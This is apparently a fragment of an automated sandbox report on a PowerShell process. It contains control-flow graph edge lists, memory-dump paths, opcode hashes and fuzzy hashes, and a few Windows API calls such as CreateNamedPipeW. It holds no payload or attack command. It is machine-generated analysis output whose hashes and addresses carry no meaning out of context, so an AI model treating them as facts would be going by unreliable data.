8dd3c10 GetFileAttributesW SetThreadUILanguage 156617->156620 156618 8dd648f 156618->156603 156619->156618 156620->156618

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 81 8de1840-8de187a 83 8de187c-8de1881 81->83 84 8de1883-8de1886 81->84 85 8de1889-8de18b1 83->85 84->85 86 8de18b7-8de18cb 85->86 87 8de2444-8de244e 85->87 91 8de18cd-8de18d3 86->91 92 8de18d9-8de18dd 86->92 95 8de18d7 91->95 96 8de18d5 91->96 93 8de18df-8de18e6 92->93 94 8de195a-8de1966 92->94 97 8de18e8-8de18ef 93->97 98 8de18f5-8de18fc 93->98 94->87 99 8de196c-8de1974 94->99 95->92 96->92 97->98 100 8de216a-8de21d5 97->100 101 8de21dc-8de2247 98->101 102 8de1902-8de1906 98->102 103 8de1976-8de198e 99->103 104 8de1992-8de19ab 99->104 100->101 111 8de224e-8de2292 101->111 105 8de190e-8de193d 102->105 106 8de1908-8de190c 102->106 113 8de1990 103->113 114 8de19b1-8de19b5 103->114 104->114 110 8de1943-8de1957 105->110 105->111 106->105 106->110 110->94 157 8de2299-8de231e 111->157 113->114 118 8de19c9 114->118 119 8de19b7-8de19bb 114->119 124 8de19cf-8de19e5 118->124 122 8de19bd-8de19bf 119->122 123 8de19c1-8de19c7 119->123 122->124 123->124 133 8de1a0c-8de1a20 124->133 134 8de19e7-8de19f8 124->134 141 8de1a95-8de1a97 133->141 142 8de1a22-8de1a90 133->142 135 8de1a01-8de1a07 134->135 140 8de1bdc-8de1bec 135->140 146 8de1c3e-8de1c44 140->146 147 8de1bee-8de1bf9 140->147 143 8de1aa9 141->143 144 8de1a99-8de1aa7 141->144 142->140 150 8de1aab-8de1aaf 143->150 144->150 151 8de1c46-8de1c7c 146->151 153 8de1c0b 147->153 154 8de1bfb-8de1c09 147->154 155 8de1abd-8de1ac4 150->155 156 8de1ab1-8de1abb 150->156 174 8de1d8d-8de1da4 151->174 175 8de1c82-8de1c8e 151->175 158 8de1c0d-8de1c0f 153->158 154->158 160 8de1ac8-8de1ad7 155->160 161 8de1ac6 155->161 156->155 186 8de238e-8de23f4 157->186 187 8de2320-8de238c 157->187 163 8de1c31-8de1c3c 158->163 164 8de1c11-8de1c19 158->164 160->157 176 8de1add-8de1ae4 160->176 161->160 163->151 167 8de1c1b-8de1c21 164->167 168 8de1c27-8de1c2f 164->168 169 8de1c25 167->169 170 8de1c23 167->170 168->151 169->168 170->168 188 8de1dbb-8de1e3b 174->188 189 8de1da6-8de1db5 174->189 175->87 178 8de1c94-8de1c9c 175->178 179 8de1ae6-8de1b3d 176->179 180 8de1b40-8de1b48 176->180 183 8de1c9e-8de1cb5 178->183 184 8de1cc1-8de1ccb 178->184 179->180 292 8de1b4a call 8de117a 180->292 293 8de1b4a call 8de1188 180->293 183->184 201 8de1cb7-8de1cbb 183->201 198 8de1d66-8de1d71 184->198 199 8de1cd1-8de1d09 184->199 193 8de23fa-8de243d 186->193 187->193 217 8de1ee6-8de1eea 188->217 218 8de1e41-8de1e46 188->218 189->188 190 8de1b50-8de1b56 190->140 193->87 202 8de1d78-8de1d87 198->202 219 8de1d0b-8de1d37 199->219 220 8de1d39-8de1d55 199->220 201->184 201->202 202->174 202->175 221 8de1f2f-8de1f33 217->221 222 8de1eec-8de1ef3 217->222 223 8de1edd-8de1ee0 218->223 219->220 228 8de1d57 220->228 229 8de1d63 220->229 230 8de1f35-8de1f3f 221->230 231 8de1f62-8de1f66 221->231 226 8de1f0e-8de1f27 222->226 227 8de1ef5-8de1f0c 222->227 223->217 232 8de1e57-8de1e5a 223->232 226->221 227->221 228->229 229->198 230->231 234 8de1f41-8de1f5b 230->234 235 8de1f68-8de1f72 231->235 236 8de1f95-8de1f99 231->236 232->87 233 8de1e60-8de1e83 232->233 250 8de1edc 233->250 251 8de1e85 233->251 234->231 235->236 242 8de1f74-8de1f8e 235->242 239 8de1f9b-8de1fa5 236->239 240 8de1fc8-8de1fcc 236->240 239->240 243 8de1fa7-8de1fc1 239->243 245 8de1fce-8de1fd8 240->245 246 8de1ffb-8de2002 240->246 242->236 243->240 245->246 252 8de1fda-8de1ff4 245->252 253 8de215a-8de2167 246->253 254 8de2008-8de2018 246->254 250->223 251->250 256 8de1e9e-8de1ea5 251->256 257 8de1e8c-8de1e93 251->257 258 8de1eb9-8de1ed5 251->258 259 8de1ea7-8de1eae 251->259 260 8de1e95-8de1e9c 251->260 261 8de1eb0-8de1eb7 251->261 252->246 254->253 264 8de201e-8de2022 254->264 256->250 257->250 258->250 259->250 260->250 261->250 265 8de206d-8de2071 264->265 266 8de2024-8de203e 264->266 267 8de20bc-8de20c0 265->267 268 8de2073-8de208d 265->268 266->265 277 8de2040-8de2065 266->277 270 8de210b-8de210f 267->270 271 8de20c2-8de20dc 267->271 268->267 279 8de208f-8de20b4 268->279 270->253 272 8de2111-8de212b 270->272 271->270 283 8de20de-8de2103 271->283 272->253 285 8de212d-8de2152 272->285 277->265 279->267 283->270 285->253 292->190 293->190
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: #
                                                                                                                                                                                • API String ID: 0-1885708031
                                                                                                                                                                                • Opcode ID: 6293df26c015bd3bc481c6ace0b4e2182329c3b4bc96b951a2686789be713a2e
                                                                                                                                                                                • Instruction ID: 8bf9a5fc17b0749cb68a22d5449fb0fc462fa90a1688bc10fd78e516d01f5c4a
                                                                                                                                                                                • Opcode Fuzzy Hash: 6293df26c015bd3bc481c6ace0b4e2182329c3b4bc96b951a2686789be713a2e
                                                                                                                                                                                • Instruction Fuzzy Hash: F872E534A00219CFDB25DF24C884B99BBB2FF48352F1485A9E84AAB391DB759DC1CF50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1445 789f06c-789f70a 1448 789f70c-789f712 1445->1448 1449 789f715-789f71e 1445->1449 1448->1449 1450 789f73d-789f741 1449->1450 1451 789f720-789f73c 1449->1451 1452 789f743-789f75a 1450->1452 1453 789f762-789f7d0 CreateNamedPipeW 1450->1453 1451->1450 1452->1453 1455 789f7d9-789f817 1453->1455 1456 789f7d2-789f7d8 1453->1456 1460 789f819-789f81d 1455->1460 1461 789f82c-789f830 1455->1461 1456->1455 1460->1461 1462 789f81f-789f822 1460->1462 1463 789f841 1461->1463 1464 789f832-789f83e 1461->1464 1462->1461 1466 789f842 1463->1466 1464->1463 1466->1466
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 0789F7C0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2163479852.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7890000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateNamedPipe
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2489174969-0
                                                                                                                                                                                • Opcode ID: 8e0222133c7b633dada4fdd051e3de18e93f136414938e35d0b78f9896d63317
                                                                                                                                                                                • Instruction ID: e862170b364e05fc6dd8d85af4eb0ba291678feb5c301c087027047d8e1bd166
                                                                                                                                                                                • Opcode Fuzzy Hash: 8e0222133c7b633dada4fdd051e3de18e93f136414938e35d0b78f9896d63317
                                                                                                                                                                                • Instruction Fuzzy Hash: 5F51E3B1D01348AFDF14CFA9D984B9DBBF2AF48314F28812AE508BB260D7749885CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 066dedf25c44a9cba3710126e01d5e4c98c0335e8642b7a3460b9fad59b7fb1c
                                                                                                                                                                                • Instruction ID: b552ddf3d934a5ca8fa2c3a8197cad7039089e68da5cc692631779d5625c6c37
                                                                                                                                                                                • Opcode Fuzzy Hash: 066dedf25c44a9cba3710126e01d5e4c98c0335e8642b7a3460b9fad59b7fb1c
                                                                                                                                                                                • Instruction Fuzzy Hash: 13821974A10218DFDB15DF64C994B99BBB2FF88351F1482A9E9099B361CB34ED81CF90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2134113894.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_4c00000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d0dd815b93c7696c4e5d170db03afe0f2768159119c772ebca73956489e5971e
                                                                                                                                                                                • Instruction ID: 3fb851219947f61b5563dc9e03ab1d33ee15230d3aeefb92b4117d9770c7c558
                                                                                                                                                                                • Opcode Fuzzy Hash: d0dd815b93c7696c4e5d170db03afe0f2768159119c772ebca73956489e5971e
                                                                                                                                                                                • Instruction Fuzzy Hash: 07523C34600209CFDB25DF68C850B9EB7B3AF89315F1485ADD909AB390DB75ED85CB60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 47917529b8f56a4768ca6a6c4a7c108b23afa3bda7a8456138ebd8084480c361
                                                                                                                                                                                • Instruction ID: 669f3a50db3e64c8f24e6d4fb62922efe9406d224e765a17417ae627b39e0057
                                                                                                                                                                                • Opcode Fuzzy Hash: 47917529b8f56a4768ca6a6c4a7c108b23afa3bda7a8456138ebd8084480c361
                                                                                                                                                                                • Instruction Fuzzy Hash: 32525C34A00259CFCB25EF64C854BADBBB2FF88351F1086A9E909AB351DB359D85CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2166948372.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 85becaced81d6ed71377400f5d28ce66cc3d46c58e69fcdb00ed56d678a505e0
                                                                                                                                                                                • Instruction ID: 7c13720e5fe0d7696326ddbbf84d8334d8c0642751286568291073b9530f1d98
                                                                                                                                                                                • Opcode Fuzzy Hash: 85becaced81d6ed71377400f5d28ce66cc3d46c58e69fcdb00ed56d678a505e0
                                                                                                                                                                                • Instruction Fuzzy Hash: 9E425E34A00719DFEB15DB64C850BA9B7B6EF88300F1085A9E509BB395DB75ADC1CFA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2172245439.0000000008C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8c90000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 968af7780aeb72d57b3ca5e280c10ecad3c8f9d5870e8c14d2d9da06e885dfbd
                                                                                                                                                                                • Instruction ID: 6cc21d48d5b8b6a0279521eef832c39b91db37d5babfaf9a744277e274134ed4
                                                                                                                                                                                • Opcode Fuzzy Hash: 968af7780aeb72d57b3ca5e280c10ecad3c8f9d5870e8c14d2d9da06e885dfbd
                                                                                                                                                                                • Instruction Fuzzy Hash: 17128D34B00214DFCF14DFA8E498A6DB7F6EF88222B1584ADD5869B355DB30ED42CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cfd0d15aa19d83653f65a2a6cd6ff92f86887842085930776d6bfc5ab0cae711
                                                                                                                                                                                • Instruction ID: 056321b9c711e0a52de91d8e2edb8c9ed2387496b3ba9c76c84aabf34141cdc4
                                                                                                                                                                                • Opcode Fuzzy Hash: cfd0d15aa19d83653f65a2a6cd6ff92f86887842085930776d6bfc5ab0cae711
                                                                                                                                                                                • Instruction Fuzzy Hash: 5F0289357002049FDB18DF79D898A6EBBF6FF88651B1581A9E506DB361CB31EC42CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2170668630.0000000008B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b90000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a3bedca6d4282a381df711dee492e9d5bedfcf9ef3016758d343d340300678b2
                                                                                                                                                                                • Instruction ID: cf3b7dc5c06c37625134b959598bb5ea3f51813e152b2e6a89637729f7de15e3
                                                                                                                                                                                • Opcode Fuzzy Hash: a3bedca6d4282a381df711dee492e9d5bedfcf9ef3016758d343d340300678b2
                                                                                                                                                                                • Instruction Fuzzy Hash: 53026A34A00609DFDB14DFA9C484A9EBBF6FF88351F158168E945AB394DB34EC46CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: be3e616e87ae286c0f2e5ad923550c0bb34491d00b18c314efe89c78fae90e44
                                                                                                                                                                                • Instruction ID: 2c21280df567d2b2addc4caf31761ecd85a9ffc89b55074109592edcc287059c
                                                                                                                                                                                • Opcode Fuzzy Hash: be3e616e87ae286c0f2e5ad923550c0bb34491d00b18c314efe89c78fae90e44
                                                                                                                                                                                • Instruction Fuzzy Hash: 66E15B34B002058FDB05DFA9D894BAEBBE6FF88351F148169E9069B3A4CB74DD41CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2166948372.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 18b42fce5529cfa8c2665cd6c2205be99e76f9fb07fef3eb1625ebdd07c50a06
                                                                                                                                                                                • Instruction ID: f591d2d951a7e45d00d185f72a249345485f1375e6fcaf0f268c5a1c7e02880e
                                                                                                                                                                                • Opcode Fuzzy Hash: 18b42fce5529cfa8c2665cd6c2205be99e76f9fb07fef3eb1625ebdd07c50a06
                                                                                                                                                                                • Instruction Fuzzy Hash: 2AE18034A00719DFEB15EB64C850BAAB776EF89300F1081A9E5097B395DB75ADC1CFA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 04385a5e4e6f62ef5ff4ac2cc4fd239e9e1781611e181a2ad7529d3033232d19
                                                                                                                                                                                • Instruction ID: 8e61038e2588d483771b06523569b45324ced9fdbfaae86db1998ef829db1d13
                                                                                                                                                                                • Opcode Fuzzy Hash: 04385a5e4e6f62ef5ff4ac2cc4fd239e9e1781611e181a2ad7529d3033232d19
                                                                                                                                                                                • Instruction Fuzzy Hash: 83C1DF34B007448FDB25EB76949466EB7E2AFC8681B04893DE906CB350DF78DC46DB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2172245439.0000000008C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8c90000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ae0d6287f6e5491ec0f2dfdebbf26f5f5243210fd14eb93d70992368c9c64351
                                                                                                                                                                                • Instruction ID: fd6d44a2ed40a7b6acae25383e481fb92a286798867afe6f64051c72bdebf948
                                                                                                                                                                                • Opcode Fuzzy Hash: ae0d6287f6e5491ec0f2dfdebbf26f5f5243210fd14eb93d70992368c9c64351
                                                                                                                                                                                • Instruction Fuzzy Hash: 91C19C35B003448FCB15DFB8D898AAEBBB2EFC4211B14856DE9469B385DF349D06CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2172791888.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8d10000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 45e7aebe46fa9ea0287ee5b2d56dd9cb3d2fb80026a3151c3bbe53167edcd666
                                                                                                                                                                                • Instruction ID: 58f0fe6d01fcc7c22b7fd151a16e7c9910cb5219abe445b1dc353824bebe788c
                                                                                                                                                                                • Opcode Fuzzy Hash: 45e7aebe46fa9ea0287ee5b2d56dd9cb3d2fb80026a3151c3bbe53167edcd666
                                                                                                                                                                                • Instruction Fuzzy Hash: EFB14C34A002049FDF14EB68E494BAEB7F2AF88352F15C169E546AB391CB75EC81CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: db066d09d7907aea0b165d207a52739069b32f5975c399f481f4e3271ebb8843
                                                                                                                                                                                • Instruction ID: 0f39aaa79d65ceb928f6d05be86e2f3ab1331c056410dc58f4b6c90ec8c60e41
                                                                                                                                                                                • Opcode Fuzzy Hash: db066d09d7907aea0b165d207a52739069b32f5975c399f481f4e3271ebb8843
                                                                                                                                                                                • Instruction Fuzzy Hash: 03B19F34A00255DFDB15EFA5D944BAEBBB2FF88342F14852DE90AAB390CB749C41CB51

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 294 8b34ca8-8b34ce8 297 8b34d64-8b34d88 294->297 298 8b34cea-8b34d0d 294->298 303 8b34d8a-8b34d93 297->303 304 8b34d9c-8b34d9e 297->304 470 8b34d10 call 8b342f8 298->470 471 8b34d10 call 8b34308 298->471 303->304 306 8b34da0-8b34daa 304->306 307 8b34dac 304->307 305 8b34d13-8b34d5c 305->297 308 8b34db1-8b34db3 306->308 307->308 309 8b34db5-8b34dd9 308->309 310 8b34e0c-8b34e27 308->310 318 8b35161-8b35173 309->318 319 8b34e39-8b34e3b 310->319 320 8b34e29-8b34e37 310->320 326 8b353a5-8b353af 318->326 327 8b35179-8b3517d 318->327 321 8b34e49-8b34e69 319->321 322 8b34e3d-8b34e47 319->322 320->319 337 8b34f6b-8b34f72 321->337 322->321 330 8b34e6e-8b34e84 322->330 334 8b353b5-8b35404 326->334 335 8b3552b-8b35532 326->335 327->326 331 8b35183-8b351e8 327->331 345 8b34f3b-8b34f5d 330->345 346 8b34e8a-8b34ed3 330->346 367 8b351ea-8b35204 331->367 368 8b3524f-8b35256 331->368 363 8b3540a-8b35424 334->363 364 8b3548c-8b35497 334->364 339 8b34f74-8b34f84 337->339 340 8b34f8f 337->340 341 8b34f95-8b35039 339->341 340->341 442 8b35141-8b3515a 341->442 443 8b3503f-8b3507e 341->443 352 8b34f68 345->352 353 8b34f5f 345->353 376 8b34ed5-8b34ee8 346->376 377 8b34eea-8b34f19 346->377 352->337 353->352 384 8b35426-8b35463 363->384 385 8b35465-8b3547e 363->385 372 8b354f1-8b35502 call 8b3d994 364->372 373 8b35499-8b354bb 364->373 396 8b35206-8b35226 367->396 397 8b35228-8b35241 367->397 374 8b35293-8b3529e 368->374 375 8b35258-8b3526f 368->375 382 8b35508-8b3550c 372->382 407 8b354d0-8b354e6 373->407 408 8b354bd-8b354c8 373->408 391 8b352a0-8b352bf 374->391 392 8b352f5-8b35301 374->392 375->374 406 8b35271-8b3528b 375->406 381 8b34f20-8b34f27 376->381 377->381 381->345 382->335 390 8b3550e-8b35522 382->390 384->385 401 8b35480 385->401 402 8b35489 385->402 390->335 428 8b352c1-8b352cc 391->428 429 8b352d4-8b352e7 391->429 410 8b35309-8b3530d 392->410 396->397 415 8b35243 397->415 416 8b3524c 397->416 401->402 402->364 406->374 407->382 408->407 410->335 417 8b35313-8b3531a 410->417 415->416 416->368 418 8b35383-8b35399 417->418 419 8b3531c-8b3532e 417->419 423 8b35330 419->423 424 8b35335-8b35376 419->424 423->424 445 8b35380 424->445 446 8b35378 424->446 428->429 429->410 442->318 450 8b35080-8b3508b 443->450 451 8b3508f-8b350ee 443->451 445->418 446->445 450->451 460 8b350f0 451->460 461 8b350fa-8b3510e 451->461 460->318 462 8b350f2-8b350f8 460->462 461->318 464 8b35110-8b3513f 461->464 462->318 462->461 464->318 470->305 471->305
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: |S(q
                                                                                                                                                                                • API String ID: 0-336117713
                                                                                                                                                                                • Opcode ID: d6b178ebc7a4c7724b535312763a7e7d5b4b7c27d43f83cb6d89ee0a07a13ec4
                                                                                                                                                                                • Instruction ID: 3e35012440ae196935f0645b6efa0c6cd5633319037b676fdf52eb00d6e56204
                                                                                                                                                                                • Opcode Fuzzy Hash: d6b178ebc7a4c7724b535312763a7e7d5b4b7c27d43f83cb6d89ee0a07a13ec4
                                                                                                                                                                                • Instruction Fuzzy Hash: CC420634A00318DFDB28DF64D898BADB7B6FF48305F1585A9E9069B3A1DB75AC41CB40

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 472 4c0e531-4c0e58e 475 4c0e590-4c0e593 472->475 476 4c0e596-4c0e5b6 call 4c0ceb4 472->476 475->476 479 4c0e6ac-4c0e7b6 476->479 480 4c0e5bc-4c0e5d5 call 4c0e4c4 476->480 508 4c0e7c7-4c0e815 IdentifyCodeAuthzLevelW 479->508 509 4c0e7b8-4c0e7c4 479->509 484 4c0e606-4c0e60b 480->484 485 4c0e5d7-4c0e5e1 480->485 486 4c0e629-4c0e64b call 4c0e4d0 484->486 487 4c0e60d-4c0e627 484->487 492 4c0e5e3-4c0e5e8 485->492 493 4c0e5ea-4c0e604 485->493 491 4c0e67b-4c0e67e call 4c0e4dc 486->491 487->491 498 4c0e683 491->498 492->493 497 4c0e64d-4c0e674 492->497 493->491 497->491 498->479 510 4c0e817-4c0e81d 508->510 511 4c0e81e-4c0e867 508->511 509->508 510->511 515 4c0e879-4c0e880 511->515 516 4c0e869-4c0e86f 511->516 517 4c0e882-4c0e891 515->517 518 4c0e897 515->518 516->515 517->518 520 4c0e898 518->520 520->520
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2134113894.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_4c00000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0e50bcbe9dad3bdf8492504d9d5d93771ba59f2c46f04204928e94c8c6b13869
                                                                                                                                                                                • Instruction ID: 4ff01b4a9af21e18db92495481fc02dc2649ae82a9ff5baf0afffc618a7e9a68
                                                                                                                                                                                • Opcode Fuzzy Hash: 0e50bcbe9dad3bdf8492504d9d5d93771ba59f2c46f04204928e94c8c6b13869
                                                                                                                                                                                • Instruction Fuzzy Hash: 03916D70D40359CFEB24DFA5C844BEEBBF6AF44304F1488AAD509AB290DB755A85CF50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1422 789f695-789f696 1423 789f698-789f69b 1422->1423 1424 789f6a0-789f70a 1422->1424 1423->1424 1426 789f70c-789f712 1424->1426 1427 789f715-789f71e 1424->1427 1426->1427 1428 789f73d-789f741 1427->1428 1429 789f720-789f73c 1427->1429 1430 789f743-789f75a 1428->1430 1431 789f762-789f7d0 CreateNamedPipeW 1428->1431 1429->1428 1430->1431 1433 789f7d9-789f817 1431->1433 1434 789f7d2-789f7d8 1431->1434 1438 789f819-789f81d 1433->1438 1439 789f82c-789f830 1433->1439 1434->1433 1438->1439 1440 789f81f-789f822 1438->1440 1441 789f841 1439->1441 1442 789f832-789f83e 1439->1442 1440->1439 1444 789f842 1441->1444 1442->1441 1444->1444
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 0789F7C0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2163479852.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7890000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateNamedPipe
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2489174969-0
                                                                                                                                                                                • Opcode ID: 9862d4a60b79efe3ec3213b60cf54c90a0b4e1614d44648040ae0187640e77a3
                                                                                                                                                                                • Instruction ID: c0827db0d5ae6e177aca62dabe65b8cd8f5acd6b0fda5e372b9f99c193d78ec9
                                                                                                                                                                                • Opcode Fuzzy Hash: 9862d4a60b79efe3ec3213b60cf54c90a0b4e1614d44648040ae0187640e77a3
                                                                                                                                                                                • Instruction Fuzzy Hash: FD51F5B1D01349AFDF14CFA9D984B9DBBF2AF48314F288129E508BB261D7749885CF51

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
